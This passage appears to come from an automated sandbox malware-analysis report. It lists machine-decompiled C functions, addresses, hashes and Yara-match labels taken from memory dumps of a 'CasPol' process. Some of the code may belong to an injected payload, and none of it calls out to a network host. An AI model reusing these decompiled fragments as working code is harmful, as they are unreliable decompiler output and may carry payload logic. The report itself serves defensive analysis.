				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                                                0x004055b6
                                                                0x004055bb
                                                                0x004055c3
                                                                0x004055cc
                                                                0x004055d6
                                                                0x004055dd
                                                                0x004055e6
                                                                0x004055f1
                                                                0x004055f9
                                                                0x00405602
                                                                0x0040560d
                                                                0x00405613
                                                                0x00405618
                                                                0x00405621
                                                                0x0040562c
                                                                0x00405634
                                                                0x0040563d
                                                                0x00405648
                                                                0x00405650
                                                                0x00405659
                                                                0x00405664
                                                                0x0040566c
                                                                0x00405675
                                                                0x00405680
                                                                0x00405688
                                                                0x00405691
                                                                0x004056a3
                                                                0x004056a6
                                                                0x004057c2
                                                                0x004057c7
                                                                0x004056ac
                                                                0x004056ac
                                                                0x004056af
                                                                0x004056b1
                                                                0x004056b4
                                                                0x004056b4
                                                                0x00405719
                                                                0x0040571e
                                                                0x00405720
                                                                0x00405726
                                                                0x00405728
                                                                0x0040572e
                                                                0x00405730
                                                                0x00405733
                                                                0x00405739
                                                                0x00000000
                                                                0x00000000
                                                                0x00405795
                                                                0x0040579b
                                                                0x0040579d
                                                                0x004057a3
                                                                0x004057a5
                                                                0x004057aa
                                                                0x004057ab
                                                                0x004057ae
                                                                0x004057b1
                                                                0x004057b4
                                                                0x004057ba
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004057ba
                                                                0x004057d1
                                                                0x004057d1
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                • Instruction ID: 34d557361ff3680d8db281d09d546e6e6a82bb9cf3e5a1677a7a0fcf1fca399d
                                                                • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                • Instruction Fuzzy Hash: 385174B3E14A214BD3188E09CC40636B792FFD8312B5F81BEDD199B357CE74E9519A90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016252A5 Relevance: .2, Instructions: 161COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 78%
                                                                			E016252A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0163EEF0(0x17179a0);
					_t104 =  *0x1718210; // 0x11c2c48
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0163EB70(_t93, 0x17179a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01669890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0163EEF0(0x17179a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0163EB70(0, 0x17179a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x11c2c55
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0165F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0163EEF0(0x17179a0);
									__eflags =  *0x1718210 - _t104; // 0x11c2c48
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1718210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E016A4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0163EB70(_t95, 0x17179a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016695D0();
											L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016695D0();
											L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0163EB70(_t93, 0x17179a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E016695D0();
										L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E016695D0();
										L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0165F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                0x016252a5
                                                                0x016252ad
                                                                0x016252b0
                                                                0x016252b3
                                                                0x016252b7
                                                                0x016252ba
                                                                0x016252bf
                                                                0x016252c4
                                                                0x016252cc
                                                                0x00000000
                                                                0x00000000
                                                                0x016252ce
                                                                0x016252d9
                                                                0x016252dd
                                                                0x016252e7
                                                                0x016252f7
                                                                0x016252f9
                                                                0x016252fd
                                                                0x01680dcf
                                                                0x01680dd5
                                                                0x01680dd6
                                                                0x01680dd7
                                                                0x01680dd8
                                                                0x01680dd9
                                                                0x01680dde
                                                                0x01680ddf
                                                                0x01680de0
                                                                0x01680de1
                                                                0x01680de2
                                                                0x01680de5
                                                                0x01680dea
                                                                0x01680dec
                                                                0x01680f60
                                                                0x01680f64
                                                                0x01680f70
                                                                0x01680f76
                                                                0x01680f79
                                                                0x01680f79
                                                                0x00000000
                                                                0x01680f64
                                                                0x01680df2
                                                                0x01680df7
                                                                0x01680e04
                                                                0x01680e0d
                                                                0x01680e0d
                                                                0x01680e10
                                                                0x01680e1a
                                                                0x01680e1c
                                                                0x01680e4c
                                                                0x01680e52
                                                                0x01680e61
                                                                0x01680e67
                                                                0x01680e6b
                                                                0x01680e70
                                                                0x01680e76
                                                                0x01680ed7
                                                                0x01680edc
                                                                0x01680ee0
                                                                0x01680ee6
                                                                0x01680eea
                                                                0x01680eed
                                                                0x01680ef0
                                                                0x01680ef3
                                                                0x01680ef6
                                                                0x01680ef9
                                                                0x01680efe
                                                                0x01680f01
                                                                0x01680f01
                                                                0x01680f0b
                                                                0x01680f12
                                                                0x01680f16
                                                                0x01680f18
                                                                0x01680f1b
                                                                0x01680f2c
                                                                0x01680f31
                                                                0x01680f31
                                                                0x01680f35
                                                                0x01680f39
                                                                0x01680f3a
                                                                0x01680f3c
                                                                0x01680f3f
                                                                0x01680f50
                                                                0x01680f55
                                                                0x01680f55
                                                                0x01680f59
                                                                0x016252eb
                                                                0x016252f1
                                                                0x016252f1
                                                                0x01680e7d
                                                                0x01680e84
                                                                0x01680e88
                                                                0x01680e8a
                                                                0x01680e8d
                                                                0x01680e9e
                                                                0x01680ea3
                                                                0x01680ea3
                                                                0x01680ea7
                                                                0x01680eaf
                                                                0x01680eb3
                                                                0x01680eb9
                                                                0x01680eb9
                                                                0x01680ebc
                                                                0x01680ecd
                                                                0x01680ecd
                                                                0x00000000
                                                                0x01680eb3
                                                                0x01680e21
                                                                0x01680e2b
                                                                0x01680e2f
                                                                0x01680e30
                                                                0x01680e3a
                                                                0x01680e3f
                                                                0x01680e41
                                                                0x00000000
                                                                0x00000000
                                                                0x01680e47
                                                                0x00000000
                                                                0x01680e47
                                                                0x01680df9
                                                                0x01680dfe
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01680dfe
                                                                0x01625303
                                                                0x01625307
                                                                0x00000000
                                                                0x01625309
                                                                0x00000000
                                                                0x01625309
                                                                0x01625307
                                                                0x016252e9
                                                                0x016252e9
                                                                0x00000000
                                                                0x016252e9
                                                                0x0162530e
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e7f38c8f7d36d7cb22b355100015cbe40466839aaff9f7bac6cf86287cc93f3f
                                                                • Instruction ID: e36d54688c181f9f1e18dee60b7bc0d73b30e3f7115aa885691f0278cb03a2c3
                                                                • Opcode Fuzzy Hash: e7f38c8f7d36d7cb22b355100015cbe40466839aaff9f7bac6cf86287cc93f3f
                                                                • Instruction Fuzzy Hash: D451BE712057429BD322EF28CC40B67BBE6FF94710F14491EF99687691E774E808CBA6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01652AE4 Relevance: .2, Instructions: 159COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E01652AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1718204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1718208; // 0x1718207
				_t8 = _t57 + 0x1718208; // 0x1718207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1718450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x171821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1716d5c; // 0x7f590654
							_t72 =  *0x1716d5c; // 0x7f590654
							_t75 =  *0x1716d5c; // 0x7f590654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1716d5c; // 0x7f590654
							_t84 =  *0x1716d5c; // 0x7f590654
							_t87 =  *0x1716d5c; // 0x7f590654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0166F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                0x01652ae4
                                                                0x01652aec
                                                                0x01652aef
                                                                0x01652af4
                                                                0x01652af7
                                                                0x01652afd
                                                                0x01652b92
                                                                0x01652b92
                                                                0x01652b97
                                                                0x01652b9c
                                                                0x01652b9c
                                                                0x01652b03
                                                                0x01652b06
                                                                0x01652b09
                                                                0x01652b09
                                                                0x01652b0f
                                                                0x01652b15
                                                                0x01652b15
                                                                0x01652b1b
                                                                0x01652b1e
                                                                0x01652b21
                                                                0x01652b26
                                                                0x01652b29
                                                                0x01652b81
                                                                0x01652b84
                                                                0x01652c0e
                                                                0x01652c15
                                                                0x01652c24
                                                                0x01652c24
                                                                0x01652b8a
                                                                0x01652b8a
                                                                0x01652b8a
                                                                0x01652b8a
                                                                0x01652b90
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01652b4a
                                                                0x01652b4a
                                                                0x01652b4d
                                                                0x01652b53
                                                                0x00000000
                                                                0x00000000
                                                                0x01652b55
                                                                0x01652b58
                                                                0x01652bb7
                                                                0x01695d1b
                                                                0x01695d37
                                                                0x01695d47
                                                                0x01695d53
                                                                0x01652bbd
                                                                0x01652bbd
                                                                0x01652bbd
                                                                0x01652bb7
                                                                0x01652b5d
                                                                0x01652c2f
                                                                0x01695d5b
                                                                0x01695d77
                                                                0x01695d87
                                                                0x01695d93
                                                                0x01652c35
                                                                0x01652c35
                                                                0x01652c35
                                                                0x01652c2f
                                                                0x01652b65
                                                                0x01652b9f
                                                                0x01652ba2
                                                                0x01652b67
                                                                0x01652b67
                                                                0x01652b69
                                                                0x01652b6b
                                                                0x01652b6e
                                                                0x01652bc9
                                                                0x01652bcc
                                                                0x01652bcf
                                                                0x01652bd4
                                                                0x01652bd6
                                                                0x01652bd6
                                                                0x01652bdb
                                                                0x01652c02
                                                                0x01652c05
                                                                0x01652c07
                                                                0x00000000
                                                                0x01652c07
                                                                0x01652be0
                                                                0x01652c00
                                                                0x01652c3f
                                                                0x01652c3f
                                                                0x00000000
                                                                0x01652c00
                                                                0x01652be5
                                                                0x01652be7
                                                                0x01652bec
                                                                0x01652bf4
                                                                0x01652bf6
                                                                0x00000000
                                                                0x01652bf6
                                                                0x01652b70
                                                                0x01652b76
                                                                0x01652b2b
                                                                0x01652b2b
                                                                0x01652b2d
                                                                0x01652b2f
                                                                0x01652b32
                                                                0x01652b35
                                                                0x01652b3a
                                                                0x00000000
                                                                0x01652b40
                                                                0x01652b43
                                                                0x01652b45
                                                                0x01652b47
                                                                0x01652b4a
                                                                0x01652b4d
                                                                0x01652b53
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01652b53
                                                                0x01652b78
                                                                0x01652b78
                                                                0x01652b7b
                                                                0x01652b7e
                                                                0x00000000
                                                                0x01652b7e
                                                                0x01652b76
                                                                0x01652ba5
                                                                0x01652ba5
                                                                0x01652ba8
                                                                0x01652bad
                                                                0x00000000
                                                                0x00000000
                                                                0x01652baf
                                                                0x01652baf
                                                                0x01652bc2
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0954312c4f1f242390bced5f6be5ffb343dd22b2227c5e6f079e546723bf84c0
                                                                • Instruction ID: fad5b7abdc27927bb0f2301bb1f6ae3fb05c4adc3e7353758e27c321e1dd2b2d
                                                                • Opcode Fuzzy Hash: 0954312c4f1f242390bced5f6be5ffb343dd22b2227c5e6f079e546723bf84c0
                                                                • Instruction Fuzzy Hash: B551AF76A00125CFCB59CF1CCCA09BDB7B1FB88704B19855EEC56AB315D734AA91CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016EAE44 Relevance: .2, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 86%
                                                                			E016EAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E016EC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E016EACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E016EFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E016EEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E01647D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E016E1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E016F1536(0x1718ae4, (_t74 -  *0x1718b04 >> 0x14) + (_t74 -  *0x1718b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L016EC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E016EA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E016CCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E016EACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                0x016eae44
                                                                0x016eae4c
                                                                0x016eae53
                                                                0x016eae55
                                                                0x016eae5c
                                                                0x016eae64
                                                                0x016eae68
                                                                0x016eae75
                                                                0x016eae75
                                                                0x016eae78
                                                                0x016eae7a
                                                                0x016eae7c
                                                                0x016eae7f
                                                                0x016eaea8
                                                                0x016eaeab
                                                                0x016eaead
                                                                0x00000000
                                                                0x00000000
                                                                0x016eaeb3
                                                                0x016eaeb8
                                                                0x016eaebb
                                                                0x016eaebd
                                                                0x00000000
                                                                0x016eae81
                                                                0x016eae88
                                                                0x016eae8f
                                                                0x016eae9b
                                                                0x016eae96
                                                                0x016eae96
                                                                0x016eae96
                                                                0x016eaea0
                                                                0x016eaea3
                                                                0x016eaebf
                                                                0x016eaebf
                                                                0x016eaec3
                                                                0x016eaec9
                                                                0x016eaf0d
                                                                0x016eaf14
                                                                0x016eaf3d
                                                                0x016eaf3d
                                                                0x016eaf41
                                                                0x016eaf44
                                                                0x016eaf67
                                                                0x016eaf67
                                                                0x016eaf6a
                                                                0x016eafca
                                                                0x016eafd1
                                                                0x00000000
                                                                0x016eafd1
                                                                0x016eaf6c
                                                                0x016eaf6d
                                                                0x016eaf75
                                                                0x016eaf7c
                                                                0x016eaf7e
                                                                0x016eaf80
                                                                0x016eaf85
                                                                0x016eaf87
                                                                0x016eaf99
                                                                0x016eaf89
                                                                0x016eaf92
                                                                0x016eaf92
                                                                0x016eaf9e
                                                                0x016eafa1
                                                                0x016eafa3
                                                                0x016eafa9
                                                                0x016eafb0
                                                                0x016eafb2
                                                                0x016eafb4
                                                                0x016eafbc
                                                                0x016eafbc
                                                                0x016eafb4
                                                                0x016eafb0
                                                                0x00000000
                                                                0x016eafa1
                                                                0x016eaf4f
                                                                0x016eaf57
                                                                0x016eaf5c
                                                                0x016eaf5e
                                                                0x00000000
                                                                0x00000000
                                                                0x016eaf60
                                                                0x016eaf64
                                                                0x016eaf64
                                                                0x00000000
                                                                0x016eaf64
                                                                0x016eaf1a
                                                                0x016eaf25
                                                                0x00000000
                                                                0x00000000
                                                                0x016eaf27
                                                                0x016eaf28
                                                                0x016eaf33
                                                                0x00000000
                                                                0x016eaed0
                                                                0x016eaed0
                                                                0x016eaed2
                                                                0x016eaee1
                                                                0x016eaee4
                                                                0x00000000
                                                                0x00000000
                                                                0x016eaee6
                                                                0x016eaeec
                                                                0x00000000
                                                                0x00000000
                                                                0x016eaefb
                                                                0x016eaf07
                                                                0x016eafd3
                                                                0x016eafdb
                                                                0x016eafdb
                                                                0x00000000
                                                                0x016eaf07
                                                                0x016eaed6
                                                                0x016eaed8
                                                                0x016eaedf
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016eaedf
                                                                0x016eaec9

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f5e896cdb3e51bdf1e16720b36a1fd3954c1d7fdf208df86d8ee007553c1a5d8
